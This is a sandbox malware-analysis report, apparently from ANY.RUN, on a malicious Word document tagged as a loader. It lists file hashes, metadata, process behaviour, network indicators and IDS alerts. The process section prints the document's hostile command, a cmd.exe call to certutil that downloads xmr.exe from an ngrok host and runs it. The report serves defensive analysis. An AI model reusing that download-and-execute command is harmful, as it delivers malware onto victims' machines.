analyze malware
  • Huge database of samples and IOCs
  • Custom VM setup
  • Unlimited submissions
  • Interactive approach
Sign up, it’s free
File name:

50f82579bcb22fab80c6402a328e58b91c5df70085eb10e3fbc59cf1bd8ddb10.doc

Full analysis: https://app.any.run/tasks/c309da85-193a-40a5-8fcf-df0353d41e2f
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: November 15, 2018, 10:59:53
OS: Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:
loader
trojan
Indicators:
MIME: application/vnd.openxmlformats-officedocument.wordprocessingml.document
File info: Microsoft Word 2007+
MD5:

0E29A276D1C1E8C129F83D68F004B06F

SHA1:

A54493E18EF2ED8ECA79C968A4FF2B6D80E821FA

SHA256:

50F82579BCB22FAB80C6402A328E58B91C5DF70085EB10E3FBC59CF1BD8DDB10

SSDEEP:

192:CtNCd3SJ7ZrWZ1uM2/CVB0m+dh6VAoH3SKxkJIf9isSw10FJNpXMg4k9:aNkeZ0M/CEmA6GopxkJMiYOVMTk9

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Starts CertUtil for downloading files

      • cmd.exe (PID: 3560)
    • Starts CMD.EXE for commands execution

      • WINWORD.EXE (PID: 3220)
    • Unusual execution from Microsoft Office

      • WINWORD.EXE (PID: 3220)
  • SUSPICIOUS

    • Creates files in the user directory

      • certutil.exe (PID: 4044)
  • INFO

    • Reads Microsoft Office registry keys

      • WINWORD.EXE (PID: 3220)
    • Creates files in the user directory

      • WINWORD.EXE (PID: 3220)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.docx | Word Microsoft Office Open XML Format document (52.2)
.zip | Open Packaging Conventions container (38.8)
.zip | ZIP compressed archive (8.8)

EXIF

ZIP

ZipRequiredVersion: 20
ZipBitFlag: 0x0006
ZipCompression: Deflated
ZipModifyDate: 1980:01:01 00:00:00
ZipCRC: 0x6cd2a4df
ZipCompressedSize: 346
ZipUncompressedSize: 1312
ZipFileName: [Content_Types].xml

XML

Template: Normal.dotm
TotalEditTime: 1 minute
Pages: 1
Words: 376
Characters: 2144
Application: Microsoft Office Word
DocSecurity: None
Lines: 17
Paragraphs: 5
ScaleCrop: No
Company: SPecialiST RePack
LinksUpToDate: No
CharactersWithSpaces: 2515
SharedDoc: No
HyperlinksChanged: No
AppVersion: 15
Keywords: -
LastModifiedBy: HP
RevisionNumber: 1
CreateDate: 2018:11:04 08:38:00Z
ModifyDate: 2018:11:04 08:39:00Z

XMP

Title: -
Subject: -
Creator: HP
Description: -
No data.
screenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshotscreenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
35
Monitored processes
3
Malicious processes
1
Suspicious processes
0

Behavior graph

Click at the process to see the details
start winword.exe no specs cmd.exe no specs certutil.exe

Process information

PID
CMD
Path
Indicators
Parent process
3220"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /n "C:\Users\admin\AppData\Local\Temp\50f82579bcb22fab80c6402a328e58b91c5df70085eb10e3fbc59cf1bd8ddb10.doc"C:\Program Files\Microsoft Office\Office14\WINWORD.EXEexplorer.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Microsoft Word
Version:
14.0.6024.1000
3560c:\windows\system32\cmd.exe /k certutil -urlcache -split -f http://aed400f4.ngrok.io/xmr.exe && xmr.exec:\windows\system32\cmd.exeWINWORD.EXE
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
6.1.7601.17514 (win7sp1_rtm.101119-1850)
4044certutil -urlcache -split -f http://aed400f4.ngrok.io/xmr.exe C:\Windows\system32\certutil.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
CertUtil.exe
Exit code:
2149122452
Version:
6.1.7600.16385 (win7_rtm.090713-1255)
Total events
1 430
Read events
799
Write events
0
Delete events
0

Modification events

No data
Executable files
0
Suspicious files
0
Text files
1
Unknown types
3

Dropped files

PID
Process
Filename
Type
3220WINWORD.EXEC:\Users\admin\AppData\Local\Temp\CVR9A50.tmp.cvr
MD5:
SHA256:
3220WINWORD.EXEC:\Users\admin\AppData\Roaming\Microsoft\Templates\~$Normal.dotmpgc
MD5:70C278D8BB09C3041479A9BC2AF4E1A9
SHA256:D69E23B5D0FBBBEA2B15D68BAE73B8D21CB5A54E7F9352E099020E7F51DABA60
4044certutil.exeC:\Users\admin\AppData\Local\Temp\xmr.exetext
MD5:E4BBD57632B8406A5C1B608492BD42D3
SHA256:8506B8ACB1F660EE4143E8E5BB3688CCD21E053C6595F3C78ADDA886EC73FB8C
4044certutil.exeC:\Users\admin\AppData\Roaming\Microsoft\Windows\IETldCache\index.datdat
MD5:D7A950FEFD60DBAA01DF2D85FEFB3862
SHA256:75D0B1743F61B76A35B1FEDD32378837805DE58D79FA950CB6E8164BFA72073A
3220WINWORD.EXEC:\Users\admin\AppData\Local\Temp\~$f82579bcb22fab80c6402a328e58b91c5df70085eb10e3fbc59cf1bd8ddb10.docpgc
MD5:93A0F56392FC199B3A34C1B919F4589B
SHA256:923F9FB9414778BDB1CE4D33154D6AB7206BFF8E3625B29C4F92BE033CDD84AC
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
2
TCP/UDP connections
2
DNS requests
1
Threats
0

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
4044
certutil.exe
GET
404
18.216.53.253:80
http://aed400f4.ngrok.io/xmr.exe
US
text
34 b
malicious
4044
certutil.exe
GET
404
18.216.53.253:80
http://aed400f4.ngrok.io/xmr.exe
US
text
34 b
malicious
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4044
certutil.exe
18.216.53.253:80
aed400f4.ngrok.io
Amazon.com, Inc.
US
whitelisted

DNS requests

Domain
IP
Reputation
aed400f4.ngrok.io
  • 18.216.53.253
malicious

Threats

PID
Process
Class
Message
Potential Corporate Privacy Violation
ET POLICY DNS Query to a *.ngrok domain (ngrok.io)
4044
certutil.exe
Misc Attack
ET TOR Known Tor Relay/Router (Not Exit) Node Traffic group 152
4044
certutil.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
4044
certutil.exe
Potential Corporate Privacy Violation
POLICY [PTsecurity] Observed MS Certutil User-Agent in HTTP Request
4044
certutil.exe
Potentially Bad Traffic
ET CURRENT_EVENTS Terse alphanumeric executable downloader high likelihood of being hostile
4 ETPRO signatures available at the full report
No debug info